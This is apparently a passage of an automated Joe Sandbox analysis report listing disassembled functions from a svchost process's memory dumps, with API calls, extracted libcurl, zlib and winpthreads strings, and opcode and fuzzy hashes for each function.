                          • Opcode Fuzzy Hash: 41f481ae3904839b845b6b966e47d7c0d9084ec4171bca2e1ba02052f09d8d33
                          • Instruction Fuzzy Hash: C441B0353D664086FB09DFB0F86036933AAFB85B6CF454525CE0A42794EF39C495CB61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$SimpleString::operator=
                          • String ID: %s?%s$Accept-Encoding$Accept-Encoding: %s$POST$Referer$Referer: %s
                          • API String ID: 1621822926-997604947
                          • Opcode ID: 0bd4f664914ea9e259e362c462dbc4fc26b2cf6bed79ad440f1911dc47278712
                          • Instruction ID: 55a9274f9ea94a82eef0cf54563bafaf8ac64d69eee2f891381becbd56646adc
                          • Opcode Fuzzy Hash: 0bd4f664914ea9e259e362c462dbc4fc26b2cf6bed79ad440f1911dc47278712
                          • Instruction Fuzzy Hash: 3F411F7AB0AB8AC4EB53CF65E4243F926A4AB46F84F490035DE4D46396EF3CE454C718
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$SimpleString::operator=
                          • String ID: %s?%s$Accept-Encoding$Accept-Encoding: %s$PUT$Referer$Referer: %s
                          • API String ID: 1621822926-4091559278
                          • Opcode ID: 06650fabf6b7c7465f164727abdc3be3143b4a5b302dd84c1aaa45273212e9e0
                          • Instruction ID: d9445e052c0c644838c5f98c46fef8a41cb76fa7d2784c68bc4761aba9eab924
                          • Opcode Fuzzy Hash: 06650fabf6b7c7465f164727abdc3be3143b4a5b302dd84c1aaa45273212e9e0
                          • Instruction Fuzzy Hash: B6411E7AB0AB8AC4EB538F65E4243F926A4AB46F84F490035DE4D46396EF3CE454C718
                          APIs
                          • TlsGetValue.KERNEL32 ref: 6494457C
                            • Part of subcall function 649444D0: __iob_func.MSVCRT ref: 64944501
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Value__iob_func
                          • String ID:
                          • API String ID: 2820842585-0
                          • Opcode ID: 0546eda2f010a2ff3f3b1f8a39091f3d6a25e4e9caee43d900f00acf19f6acdb
                          • Instruction ID: 16148a25f4b476eea67aa2965a04ab47484b3a23098f2b50d2a6f1ecfa518ab3
                          • Opcode Fuzzy Hash: 0546eda2f010a2ff3f3b1f8a39091f3d6a25e4e9caee43d900f00acf19f6acdb
                          • Instruction Fuzzy Hash: 62316F716916408BFB259F71F80835B77A5F709BA8F140229CEAA477A0DF3DD059CB20
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _fstat64strchr
                          • String ID: Can't get the size of file.$Content-Length: %lld$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer$ytes
                          • API String ID: 2257945287-3101949335
                          • Opcode ID: afacff5949dba494b15f094d390e0d3cf13b30e035ac943e2aad6cb6084ab8c4
                          • Instruction ID: 513f0cff8f5de9d757c9a790e3ba4f6e5ace7405cf94049dce7e45d8ce7e82bc
                          • Opcode Fuzzy Hash: afacff5949dba494b15f094d390e0d3cf13b30e035ac943e2aad6cb6084ab8c4
                          • Instruction Fuzzy Hash: DEB1D12AB1A68A85FB12CF6598203FD27A1EB46F94F440031DE4D47B96EF3DE941D704
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLasthtonssend
                          • String ID: Sending data failed (%d)
                          • API String ID: 2027122571-2319402659
                          • Opcode ID: c12e462eca2e6c078f13945e67d4fb94a9b87ce196abfb17e36915c96fb93957
                          • Instruction ID: 27d861c683718b7f4893d4e79c0a0dd929ad06a064c03f13300d7fb6ffef760f
                          • Opcode Fuzzy Hash: c12e462eca2e6c078f13945e67d4fb94a9b87ce196abfb17e36915c96fb93957
                          • Instruction Fuzzy Hash: 4441C237B05A8A80EB029F75E428BA92720F756F99F444532EF5907796DF7CD0458309
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Init2_inflate$Versionzlib
                          • String ID: 1.2.0.4$1.3.1$Error while processing content unencoding: %s$Error while processing content unencoding: Unknown failure within decompression software.
                          • API String ID: 302536580-782595508
                          • Opcode ID: 5e8faf5ed2759c0201d2404577fbf2c9aece4fef74bc6189fcbe6ee69d6734c5
                          • Instruction ID: 8e6ec54ad24276e079b6e52cc9e7ae003515ec36b11970b16cfca9bc64ef4590
                          • Opcode Fuzzy Hash: 5e8faf5ed2759c0201d2404577fbf2c9aece4fef74bc6189fcbe6ee69d6734c5
                          • Instruction Fuzzy Hash: D421C16BB1DA8682E7528F25F4203693760FB46F80F844532DA4E43B57DF2CE485C708
                          APIs
                          • WaitForMultipleObjects.KERNEL32 ref: 64941EE9
                          • WaitForSingleObject.KERNEL32 ref: 64941F23
                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000070,00007FFDB43BF230,00007FFDB43BFAA0,00000068,?,649421DE,?,?,6494246F), ref: 64941F82
                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000070,00007FFDB43BF230,00007FFDB43BFAA0,00000068,?,649421DE,?,?,6494246F), ref: 6494209A
                          • ResetEvent.KERNEL32 ref: 649420FD
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: Wait$ObjectSingle$EventMultipleObjectsReset
                          • String ID:
                          • API String ID: 654736092-0
                          • Opcode ID: 96c9b5ad3ac0c7c7edf09851d5da80622a09f72e97e6fc1457996ee278957ded
                          • Instruction ID: d3ee0eaab07988580939ca2428ce104d4a652107eb983c9cf61b1eb5acf66ab1
                          • Opcode Fuzzy Hash: 96c9b5ad3ac0c7c7edf09851d5da80622a09f72e97e6fc1457996ee278957ded
                          • Instruction Fuzzy Hash: 665114223D440041F7214667E94A3AA0A5FBB577ECF5401A2CF26CA6A1FBBDC5D2C226
                          APIs
                          • strchr.VCRUNTIME140(?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559B6CC
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,00007FFDA5574786), ref: 00007FFDA559B8E7
                            • Part of subcall function 00007FFDA55949A0: strchr.VCRUNTIME140 ref: 00007FFDA5594A58
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: strchr$free
                          • String ID: %s%s%s:%d$CONNECT$Host$Keep-Alive$Proxy-Connection$User-Agent
                          • API String ID: 3578582447-3503046744
                          • Opcode ID: c7c9ca203e809c69a7538edbe9d9348459ea286da67521505a18d22d4896c789
                          • Instruction ID: 7c868088d1c6cd74550e47d0746ea638d96776a14bbbb2b21dbed0f96bb5ac93
                          • Opcode Fuzzy Hash: c7c9ca203e809c69a7538edbe9d9348459ea286da67521505a18d22d4896c789
                          • Instruction Fuzzy Hash: AE717E6AB0E68AC1FA629F51A4603B927A0FF97F94F444432DA8D47787DF3CE4058348
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000002,?,?,00007FFDA55A3249), ref: 00007FFDA55A387A
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000002,?,?,00007FFDA55A3249), ref: 00007FFDA55A390E
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000002,?,?,00007FFDA55A3249), ref: 00007FFDA55A3919
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$malloc
                          • String ID: No MQTT topic found. Forgot to URL encode it?$Too long MQTT topic
                          • API String ID: 2190258309-1276830682
                          • Opcode ID: 1453a0216d4a61804d3a858584b32711943582c8b600f61607bb6e43e0791b2e
                          • Instruction ID: 9441a249f3fa802a396626eb51200e97aa9bc9f0728f773e4bd8c37931d7aefd
                          • Opcode Fuzzy Hash: 1453a0216d4a61804d3a858584b32711943582c8b600f61607bb6e43e0791b2e
                          • Instruction Fuzzy Hash: A041F16AB0A79A82EA029F15F4643B96790EB96FD8F450132EF4D077D7DE2DD506C300
                          APIs
                            • Part of subcall function 64942170: EnterCriticalSection.KERNEL32(00000120,00000000,00000068,00000000,?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89), ref: 6494219E
                            • Part of subcall function 64942170: LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421B1
                          • TryEnterCriticalSection.KERNEL32 ref: 64942287
                          • LeaveCriticalSection.KERNEL32 ref: 649422C3
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID:
                          • API String ID: 3168844106-0
                          • Opcode ID: 64a14b26eebd602a32318612d1c73aaa2676a09661875bd3566d3150fd0f9fc1
                          • Instruction ID: c70b7dd98fa8b30a946d7bfc7cacc3f56c823bbf88279334903176617df7d1a3
                          • Opcode Fuzzy Hash: 64a14b26eebd602a32318612d1c73aaa2676a09661875bd3566d3150fd0f9fc1
                          • Instruction Fuzzy Hash: 17318C2238060486EB149F76E9507DA2365BB86FECF884732CD69973E4DF35C859C351
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 64947015
                          • GetThreadTimes.KERNEL32 ref: 64947037
                          • GetCurrentProcess.KERNEL32 ref: 64947080
                          • GetProcessTimes.KERNEL32 ref: 649470A2
                          • _errno.MSVCRT ref: 649470AC
                          • GetSystemTimeAsFileTime.KERNEL32 ref: 649470CC
                          • QueryPerformanceFrequency.KERNEL32 ref: 649470F5
                          • QueryPerformanceCounter.KERNEL32 ref: 64947104
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: CurrentPerformanceProcessQueryThreadTimeTimes$CounterFileFrequencySystem_errno
                          • String ID:
                          • API String ID: 3786581644-0
                          • Opcode ID: 1cbd5dd333b386ab46c507ef65a2726135c869851dae07a2f01727df85f622f6
                          • Instruction ID: 1c768bd9e69684d563be0dbbaa5e68889a0c424e9680141303368067254932ee
                          • Opcode Fuzzy Hash: 1cbd5dd333b386ab46c507ef65a2726135c869851dae07a2f01727df85f622f6
                          • Instruction Fuzzy Hash: A2318372755B8883DF09EF61E81036AB366FBD5B88F509126EA9A4B758EF3DC014C740
                          APIs
                            • Part of subcall function 00007FFDA55CA6B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CA6E2
                            • Part of subcall function 00007FFDA55CA6B0: _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA55CA6F0
                            • Part of subcall function 00007FFDA55CA6B0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55CA6FC
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C9722
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C9773
                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA55C97DD
                            • Part of subcall function 00007FFDA5582C60: wcschr.VCRUNTIME140 ref: 00007FFDA5582CC1
                            • Part of subcall function 00007FFDA5582C60: _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA5582CED
                            • Part of subcall function 00007FFDA5582C60: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5582D2B
                            • Part of subcall function 00007FFDA5582C60: wcsncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA5582D46
                            • Part of subcall function 00007FFDA5582C60: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5582D64
                            • Part of subcall function 00007FFDA5582C60: _wcsdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA5582D7D
                            • Part of subcall function 00007FFDA5582C60: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA5582DA9
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$_wcsdup$callocmalloc$wcschrwcsncpy
                          • String ID: GSSAPI$GSSAPI handshake failure (empty challenge message)$Kerberos$SSPI: couldn't get auth info
                          • API String ID: 3657581166-3211747215
                          • Opcode ID: be77fdceb083cccfa667339f0eccfff52253ab26ffe642b20fd30fd3a419145d
                          • Instruction ID: 31844f3552d079d4477effce7be21ad8c3770c471b5dd554d4c01b9a0fc2e251
                          • Opcode Fuzzy Hash: be77fdceb083cccfa667339f0eccfff52253ab26ffe642b20fd30fd3a419145d
                          • Instruction Fuzzy Hash: 1E915A7AB0AB4A86EB128F65E4603AD23B5FB46F88F404035DE4D57B9ADF38E445C344
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: Digest$stale$true
                          • API String ID: 1294909896-2487968700
                          • Opcode ID: 825711940c4339f0b0f10af0562f396d60dc81393043e1d307ce092e7f71487e
                          • Instruction ID: c335a99cbadb19cf2d1e36b32c6a9d81d9c27544e3f2b270599612dd5680b134
                          • Opcode Fuzzy Hash: 825711940c4339f0b0f10af0562f396d60dc81393043e1d307ce092e7f71487e
                          • Instruction Fuzzy Hash: A451B46AB0EA8A81EB628F15E4603B963B1EB47F84F445131EA8D037C6DF2CF555C618
                          APIs
                          Strings
                          • &, xrefs: 6494160E
                          • (((barrier_t *)*barrier)->valid == LIFE_BARRIER) && (((barrier_t *)*barrier)->busy > 0), xrefs: 64941621
                          • Assertion failed: (%s), file %s, line %d, xrefs: 64941628
                          • ../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/barrier.c, xrefs: 64941616
                          Memory Dump Source
                          • Source File: 00000035.00000002.3359348861.0000000064941000.00000020.00000001.01000000.00000012.sdmp, Offset: 64940000, based on PE: true
                          • Associated: 00000035.00000002.3359315994.0000000064940000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359400917.000000006494A000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359435315.000000006494E000.00000002.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359469079.0000000064950000.00000004.00000001.01000000.00000012.sdmp
                          • Associated: 00000035.00000002.3359501861.0000000064953000.00000008.00000001.01000000.00000012.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_64940000_svchost.jbxd
                          Similarity
                          • API ID: __iob_func
                          • String ID: &$(((barrier_t *)*barrier)->valid == LIFE_BARRIER) && (((barrier_t *)*barrier)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/barrier.c$Assertion failed: (%s), file %s, line %d
                          • API String ID: 686374508-3470151808
                          • Opcode ID: 06c8006b2e40a1b02f2937bba9d3daa3392596c9965291c53121d202f0f451b8
                          • Instruction ID: a6c690fc7c4ad125f6452d29da4510a78f9609d2262ab1e3dfa78bf125776778
                          • Opcode Fuzzy Hash: 06c8006b2e40a1b02f2937bba9d3daa3392596c9965291c53121d202f0f451b8
                          • Instruction Fuzzy Hash: FD41D13339160586EB20DB36E91436E6765E792BECF884121DE1E47764DF38C892C700
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _gmtime64
                          • String ID: %s: %s, %02d %s %4d %02d:%02d:%02d GMT$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified
                          • API String ID: 1355024304-4153637960
                          • Opcode ID: faf39b1bc8a21587184d5586f50a3b0ceb46b29f085b2b703a6ec10082a9352d
                          • Instruction ID: 826a5d17b9ccb0fa284de1ccc02cefc628cf83902ec4d9e7a5afc36960fb146d
                          • Opcode Fuzzy Hash: faf39b1bc8a21587184d5586f50a3b0ceb46b29f085b2b703a6ec10082a9352d
                          • Instruction Fuzzy Hash: D741407A70E78AC6E621DF15E46037A67A0FB87B80F500132DA4D47B96DF2CE901CB44
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID: Failure sending QUIT command: %s$QUIT
                          • API String ID: 1294909896-1162443993
                          • Opcode ID: e9f5c25c0c0cbdff4d56f90e4297242a8fbafeb5f8e24c25148f9f13a79a548b
                          • Instruction ID: 07630ced8d844cbd4729e9a9dbd03d6593db781f3d30065bb9f774d2a8eb5e9b
                          • Opcode Fuzzy Hash: e9f5c25c0c0cbdff4d56f90e4297242a8fbafeb5f8e24c25148f9f13a79a548b
                          • Instruction Fuzzy Hash: 7D318D7AB0E78981EB169F21E4643A933A0EF46F84F484071DE4D07B86DF2CE099C725
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
